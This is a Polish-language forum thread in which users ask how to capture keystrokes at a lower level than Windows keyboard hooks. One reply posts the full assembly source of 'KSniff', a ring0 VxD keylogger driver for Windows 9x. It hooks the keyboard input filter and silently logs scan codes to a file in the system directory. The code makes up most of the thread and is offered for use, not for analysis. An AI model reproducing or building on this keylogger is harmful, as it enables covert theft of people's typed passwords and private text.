WH_KEYBOARD & WH_KEYBOARD_LL

A

arekit

Użytkownik
Dołączył
Wrzesień 26, 2004
Posty
2
Witam Wszystkich!!!

Kiedyś używałem do podsłuchu klawiatury Hook'a WH_KEYBOARD, niedawno odkryłem, że jest niby lepszy hook WH_KEYBOARD_LL. Ten nowy nie zwielokrotnia znaków z niektórych aplikacji (np Word czy GG) ale powoduje, że np z Buildera C++ nie można podsłuchać. Czy są jakieś inne hooki, które można było by wykorzystać do tych czynności a może są inne mechanizmy win by zrobić to bardziej nisko poziomowo. Wydaje mi się, że na pewno dałoby się to zrobić będąc w ring0, ale na razie to nie wiem jak się za to wsiąść, bo to już trzeba by wykorzystywać luki w systemie a chciałem to zrobić jednak za pomocą dostępnych mechanizmów.

Pozdrawiam i dzięki za pomoc:)
Arek
 
S

saipix

Użytkownik
Dołączył
Sierpień 13, 2004
Posty
131
No włąśnie.
Mnie też to interesuje i chyba najniższym (czyt.najlepszym) poziomem będzie tutaj kod assemblera.
Nie znam się na assemblerze....może ktoś mógły zapodać kod...? ? ?
 
F

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
;Oto plik sterownika z KSniff version 0.2 Ring0 vxd keylogger'a:
;Jak ktos ma cos wiecej to prosze o kontakt!
;A tu niespodzianka: //nieaktywny link
;moze sie przydac dociekliwym badaczom kodu ;-)
;Zapraszam do mojego tematu: Keyloggert->Keylogger - poziom
;systemowy

Kod: 
.386p



;---------------------------------------------------------------------------;

; Includes**************************************************************** ;

;---------------------------------------------------------------------------;



INCLUDE VMM.INC

INCLUDE VKD.INC

INCLUDE IFSMGR.INC



;---------------------------------------------------------------------------;

; Some constants********************************************************** ;

;---------------------------------------------------------------------------;



; IFS.INC constants



R0_OPENCREATFILE equ 0D500h

R0_GETFILESIZE** equ 0D800h

R0_WRITEFILE**** equ 0D601h

R0_CLOSEFILE**** equ 0D700h



;---------------------------------------------------------------------------;

; EBIOS_DDB****************************************************************;

;---------------------------------------------------------------------------;



Declare_Virtual_Device EBIOS, 1, 0, Control_Proc, EBIOS_Device_ID, SHELL_Init_Order+010000h, , ,



;---------------------------------------------------------------------------;

; Locked Data Segment******************************************************;

;---------------------------------------------------------------------------;



VxD_LOCKED_DATA_SEG



;---------------------------------------------------------------------------;

; Locked Code Segment (in the Locked Data Segment)************************ ; 

;---------------------------------------------------------------------------;



VxD_LOCKED_CODE_SEG



Prev_Keyboard_Hook******dd 0** ; Addresses of previous service handlers

Disable**************** db 0



LogFileName************ db 'ksniff.ax',0,0,0,0** ; pad out with zeroes to

************************************************ ; make hexedit possible

LFNLen******************EQU $-offset LogFileName

Root********************db ''

LogFilePath************ db 256 dup (0)

LogFileHandle********** dd 0

LogFileOffset********** dd 0



NewSessionID************db 0FFh

ScanCode****************db 0



Busy********************db 0



;---------------------------------------------------------------------------;

; Control Proc************************************************************ ;

;---------------------------------------------------------------------------;



BeginProc Control_Proc

********Control_Dispatch Device_Init, Do_Device_Init

********Control_Dispatch System_Exit, Cleanup

********clc

********ret

EndProc Control_Proc



;---------------------------------------------------------------------------;

; Main Proc****************************************************************;

;---------------------------------------------------------------------------;



BeginProc Do_Device_Init



********pushfd************************ ; save flags on stack

********pushad************************ ; save registers on stack



********mov [Disable], 0************** ; 0 means Init OK



****** ; Get %WINDIR%SYSTEM



********VMMCall Get_Exec_Path

********cmp ecx, 256-LFNLen; if "%WINDIR%SYSTEM" is too long,

********jbe Okay

********mov ecx, 1******** ; then just use "" (Root)

********mov esi, OFFSET32 Root

********jmp Useroot

Okay:

********mov esi, edx

Useroot:

********mov edi, OFFSET32 LogFilePath

********cld

********rep movsb

********mov esi, OFFSET32 LogFileName

********mov ecx, [LFNLen]

********rep movsb



****** ; Create and open logfile



********mov eax, R0_OPENCREATFILE

********mov ebx, 2; Flags

********mov ecx, 0; Attributes

********mov edx, 0011h; Action

********mov esi, OFFSET32 LogFilePath

********VxDCall IFSMgr_Ring0_FileIO

********jc Abort

********mov LogFileHandle, eax



****** ; Set our pointer to the end of the file



********mov eax, R0_GETFILESIZE

********mov ebx, [LogFileHandle]

********VxDCall IFSMgr_Ring0_FileIO

********jc Abort

********mov [LogFileOffset], eax



****** ; Write NEW SESSION ID (byte 0FFh) to logfile



********mov eax, R0_WRITEFILE

********mov ebx, [LogFileHandle]

********mov ecx, 1; Number of bytes to write

********mov edx, [LogFileOffset]

********mov esi, OFFSET32 NewSessionID

********VxDCall IFSMgr_Ring0_FileIO



********inc LogFileOffset



****** ; Hook keyboard service



********GetVxDServiceOrdinal eax, VKD_Filter_Keyboard_Input

********mov esi, OFFSET32 Keyboard_Hook

********VMMcall Hook_Device_Service

********jc Abort

********mov [Prev_Keyboard_Hook], esi



********jmp Device_Init_End



Abort:

********mov [Disable], 1************** ; disable hook operation



Device_Init_End:

********popad**************************; restore registers on stack

********popfd**************************; restore flags on stack



********ret



EndProc Do_Device_Init



;---------------------------------------------------------------------------;

; Cleanup Proc**********************************************************************;

;---------------------------------------------------------------------------;



BeginProc Cleanup



****** ; VKD_Keyboard_Input_Filter service unhook code should be here



********mov eax, R0_CLOSEFILE

********mov ebx, [LogFileHandle]

********VxDCall IFSMgr_Ring0_FileIO



********ret



EndProc Cleanup



;---------------------------------------------------------------------------;

; VKD_Filter_Keyboard_Input hook procedure****************************************** ;

;---------------------------------------------------------------------------;



BeginProc Keyboard_Hook, HOOK_PROC, Prev_Keyboard_Hook, LOCKED



********cmp [Busy], 0********************; !!!!!! BUGFIX !!!!!!

********jz EverythingOkay****************; this was a real pain in the

**************************************** ; ass, believe me

********stc; skip the f****** key



****** ;jmp [Prev_Keyboard_Hook]



********ret; don't jump to previous hook, return



EverythingOkay:



********mov [Busy], 1



********pushad

********pushfd



********cmp [Disable], 0**************** ; Is hook operation disabled?

********jnz Keyboard_Hook_End



****** ;cmp cl, 03Fh******************** ; Filter out <F5> (SoftIce)

****** ;jz Keyboard_Hook_End

****** ;cmp cl, 0BFh

****** ;jz Keyboard_Hook_End



********mov [ScanCode], cl



********mov eax, R0_WRITEFILE

********mov ebx, [LogFileHandle]

********mov ecx, 1; Number of bytes to write

********mov edx, [LogFileOffset]

********mov esi, OFFSET32 ScanCode

********VxDCall IFSMgr_Ring0_FileIO



********inc LogFileOffset



Keyboard_Hook_End:



********popfd

********popad



********mov [Busy], 0



********clc



********jmp [Prev_Keyboard_Hook]******; Chain to previous hook



EndProc Keyboard_Hook



VxD_LOCKED_CODE_ENDS



VxD_LOCKED_DATA_ENDS



********END
 
Ostatnio edytowane przez moderatora:
You must log in or register to reply here.
Do góry Bottom